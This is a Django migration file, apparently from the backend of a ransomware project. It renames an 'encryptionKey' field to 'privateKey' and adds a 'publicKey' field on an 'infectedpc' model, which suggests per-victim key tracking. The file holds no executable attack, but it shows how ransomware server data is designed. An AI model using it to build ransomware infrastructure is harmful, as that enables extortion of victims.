# Generated by Django 3.0.4 on 2020-04-05 16:10

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('ransomware', '0002_infectedpc_paymentstatus'),
    ]

    operations = [
        migrations.RenameField(
            model_name='infectedpc',
            old_name='encryptionKey',
            new_name='privateKey',
        ),
        migrations.AddField(
            model_name='infectedpc',
            name='publicKey',
            field=models.CharField(default=1, max_length=255),
            preserve_default=False,
        ),
    ]
